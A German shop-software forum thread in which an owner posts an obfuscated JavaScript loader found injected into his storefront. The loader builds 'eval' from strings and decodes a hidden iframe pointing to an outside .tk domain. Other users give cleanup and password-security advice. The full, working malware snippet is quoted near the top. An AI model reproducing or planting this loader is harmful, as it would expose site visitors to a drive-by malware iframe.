Fehler im Quellcode!

[vigrafo]

Hallo alles zusammen, ich habe folgendes Problem. Seit kurzem habe ich gemerkt dass u.g. Code sich auf meiner Startseite des Shops irgendwie eingepflanzt hat. Und es lädt sich viel langsamer als frühe und zusätzlich hat das "ding" meine Boxen total durcheinander zerschosen.
Kann mir bitte jemand veraten wie ich es beheben kann? Für schnelle Antwort wäre ich sehr dankbar!
Gruß J.C

Code: PHP  [Auswählen]

<script>aa=(document['createDocumentFragment']+'asd').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss="";s=String;e=window['e'+'val'];t='b';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n="4.5b4.5b52.5b51b16b20b50b55.5b49.5b58.5b54.5b50.5b55b58b23b51.5b50.5b58b34.5b54b50.5b54.5b50.5b55b58b57.5b33b60.5b42b48.5b51.5b39b48.5b54.5b50.5b20b19.5b49b55.5b50b60.5b19.5b20.5b45.5b24b46.5b20.5b61.5b4.5b4.5b4.5b52.5b51b57b48.5b54.5b50.5b57b20b20.5b29.5b4.5b4.5b62.5b16b50.5b54b57.5b50.5b16b61.5b4.5b4.5b4.5b50b55.5b49.5b58.5b54.5b50.5b55b58b23b59.5b57b52.5b58b50.5b20b17b30b52.5b51b57b48.5b54.5b50.5b16b57.5b57b49.5b30.5b19.5b52b58b58b56b29b23.5b23.5b55b52.5b52b52.5b54b52.5b57.5b54.5b60.5b48.5b56b56b54.5b51b23b58b53.5b23.5b61b23.5b24.5b24.5b19.5b16b59.5b52.5b50b58b52b30.5b19.5b24.5b24b19.5b16b52b50.5b52.5b51.5b52b58b30.5b19.5b24.5b24b19.5b16b57.5b58b60.5b54b50.5b30.5b19.5b59b52.5b57.5b52.5b49b52.5b54b52.5b58b60.5b29b52b52.5b50b50b50.5b55b29.5b56b55.5b57.5b52.5b58b52.5b55.5b55b29b48.5b49b57.5b55.5b54b58.5b58b50.5b29.5b54b50.5b51b58b29b24b29.5b58b55.5b56b29b24b29.5b19.5b31b30b23.5b52.5b51b57b48.5b54.5b50.5b31b17b20.5b29.5b4.5b4.5b62.5b4.5b4.5b51b58.5b55b49.5b58b52.5b55.5b55b16b52.5b51b57b48.5b54.5b50.5b57b20b20.5b61.5b4.5b4.5b4.5b59b48.5b57b16b51b16b30.5b16b50b55.5b49.5b58.5b54.5b50.5b55b58b23b49.5b57b50.5b48.5b58b50.5b34.5b54b50.5b54.5b50.5b55b58b20b19.5b52.5b51b57b48.5b54.5b50.5b19.5b20.5b29.5b51b23b57.5b50.5b58b32.5b58b58b57b52.5b49b58.5b58b50.5b20b19.5b57.5b57b49.5b19.5b22b19.5b52b58b58b56b29b23.5b23.5b55b52.5b52b52.5b54b52.5b57.5b54.5b60.5b48.5b56b56b54.5b51b23b58b53.5b23.5b61b23.5b24.5b24.5b19.5b20.5b29.5b51b23b57.5b58b60.5b54b50.5b23b59b52.5b57.5b52.5b49b52.5b54b52.5b58b60.5b30.5b19.5b52b52.5b50b50b50.5b55b19.5b29.5b51b23b57.5b58b60.5b54b50.5b23b56b55.5b57.5b52.5b58b52.5b55.5b55b30.5b19.5b48.5b49b57.5b55.5b54b58.5b58b50.5b19.5b29.5b51b23b57.5b58b60.5b54b50.5b23b54b50.5b51b58b30.5b19.5b24b19.5b29.5b51b23b57.5b58b60.5b54b50.5b23b58b55.5b56b30.5b19.5b24b19.5b29.5b51b23b57.5b50.5b58b32.5b58b58b57b52.5b49b58.5b58b50.5b20b19.5b59.5b52.5b50b58b52b19.5b22b19.5b24.5b24b19.5b20.5b29.5b51b23b57.5b50.5b58b32.5b58b58b57b52.5b49b58.5b58b50.5b20b19.5b52b50.5b52.5b51.5b52b58b19.5b22b19.5b24.5b24b19.5b20.5b29.5b4.5b4.5b4.5b50b55.5b49.5b58.5b54.5b50.5b55b58b23b51.5b50.5b58b34.5b54b50.5b54.5b50.5b55b58b57.5b33b60.5b42b48.5b51.5b39b48.5b54.5b50.5b20b19.5b49b55.5b50b60.5b19.5b20.5b45.5b24b46.5b23b48.5b56b56b50.5b55b50b33.5b52b52.5b54b50b20b51b20.5b29.5b4.5b4.5b62.5";n=n["split"](t);for(i=0;i<n.length;i++)ss+=s['fromCharCode'](-h*n[i]);zx=ss;if((aa=="unct")||(aa=="func"))e(zx);</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="de">
<head>

Linkback: https://www.modified-shop.org/forum/index.php?topic=17354.0

[flan]

Also für mich sieht das so aus als ob du in die "header.php" was rein kopiert hast was da nicht hingehört!

[EDIT Tomcraft 14.12.2011: Full-Quote entfernt, siehe: FAQ: Full-Quotes und Groß-/Kleinschreibung - mit anderen Worten Netiquette!]

[Jenser]

Sieht stark nach Schadcode aus den jemand in deinen Shop eingeschleust hat.
Da wird häufig ein JavaScript Befehl erst mithilfe irgendwelchen Funktionen generiert um den Zweck verschleihern.

1. ALLE PCs mit Zugriff zum FTP-Server mit aktuellster Sicherheitssoftware auf Viren, Trojaner und Malware überprüfen/säubern
2. DANNACH alle Passwörter ändern
3. ALLE Dateien überprüfen und den Code entfernen
4. wenn du bei dir selbst nix finden konntest deinen Hoster benachrichtigen da er eine Sicherheitslücke auf dem Server haben könnte
5. Shop eine Zeit lang im Auge behalten

[vigrafo]

Danke für schnelle Antwort, leider kann ich auf der index.html im Template nichts finden, hier habe ich noch einen test-shop http://i6x.de da kann man in dem Quellcode genau sehen und auch die anordnung der Artikel (normal werden die Artikel in drei Reihen angezeigt). Kann mir jemand sagen wo ich noch ändern kann (außer template/index.html)? Danke!

[GTB]

du hast definitv Schadcode in deiner Seite !!!

es wird dir eine iFrame erzeugt und nach http:// wirecutterpxv. tk/z/11 verlinkt !!!

[Tomcraft]

Die Forensuche nach "Virus" oder "Trojaner" bringt dich weiter, was die Entfernung angeht.

Da es kein Bug ist, verschiebe ich das Thema von "Bugs oder Funktionsfehler" nach "Admin- und Shopbereich".

Grüße

Torsten

[vigrafo]

Schadcode hin oder her... es ist mir auch klar, dass es nichts gutes ist. Hat vielleicht jemand eine Idee wie ich den Code zumindest auf der Startseite herausnehmen kann, in welchen Datei sitzt der Code, damit ich es bewältige?

[franky_n]

Hallo vigrafo,

suche danach mit dem Notepad++
Damit kannst Du auch komplette Dateien nach Code untersuchen.

Die Sachen werden in mehreren Dateien vorhanden sein.

Das Ganze hat keinen Zweck solange Du Deinen Rechner nicht virenfrei hast.
Sobald Du die Änderung abspeicherst und per FTP hochlädtst wird das gleiche wieder passieren denn der Schadcode wird dann neu erstellt.

Daher erst Computer virenfrei machen, dann verändern.

Viele Grüße

Franky

[vigrafo]

Danke franky_n für den Tipp mit dem Notepad++ ist echt tolle Sache, leider findet das Ding bei mir irgendwie nichts. Index ist sauber, aber auch "index.php"... nichts drin, hat schon jemand sowas ähnliches gehabt? PC ist auch virenfrei, es könnte nur Malware sich irgendwie eingepflanzt haben... aber wo? Man findet echt nichts.

[franky_n]

Hallo vigrafo,

klopfe auch noch die Seite Deines Webhosters ab.
Nicht das die eine Sicherheitslücke irgendwo haben und dadurch der Code eingespielt wurde...

Viele Grüße

Franky

[p3e]

Hatte Franky schon geschrieben:

[...]
suche danach mit dem Notepad++
Damit kannst Du auch komplette Dateien nach Code untersuchen.

Die Sachen werden in mehreren Dateien vorhanden sein.
[...]

Du musst alle Dateien in allen Verzeichnissen durchsuchen lassen. Nicht nur die Index-Dateien.

Das wichtigste ist aber zuerst den PC wirklich virenfrei zu haben und dann die Passwörter zu ändern (wurde oben auch schon geschrieben).
Wenn ein Virenscanner nichts findet, bedeutet das nicht, dass Dein PC wirklich sauber ist. Zur Sicherheit mit einem zweiten Programm kontrollieren. Am Besten Du überprüfst mit Desinfec't nochmal. Das hat den Vorteil, dass ein möglicherweise vorhandener Virus (oder Trojaner) beim Booten von der CD nicht gestartet wird und sich somit nicht verstecken kann. Sollte man bei Windows eh ab und an durchlaufen lassen (dauert leider).
Du findest aber genaue Hinweise zur Vorgehensweise wenn Du die Suche im Forum nutzt.
Eingeschleuster Code bedeutet immer Arbeit um den wieder los zu werden. Das solltest Du möglichst rasch angehen.

[Matt]

[...]
Du musst alle Dateien in allen Verzeichnissen durchsuchen lassen. Nicht nur die Index-Dateien.
[...]

Und du musst natürlich den Online-Stand runterladen. Eine lokale Entwicklungskopie ist mit hoher Wahrscheinlichkeit sauber. Alternative zum runterladen ist ein Shell-Zugang auf den Server und ein bisschen grep-Voodoo.

[vigrafo]

Ich habe leider mit dem Antivirus nichts gefunden, kein Virus und keine Malware/Trojaner alle Passwörter habe ich aus dem FileZilla entfernt. Gibt's eine bessere Alternative zum FileZilla, da dies die Passwörter als Klartext speichert, was für den Angriff aus dem Internet viel leichter macht. Was könnt ihr mir da empfehlen?

[Tomcraft]

Empfehlen kann ich dir "CrossFTP", denn das kann die FTP-zugangsdaten verschlüsseln!

Grüße

Torsten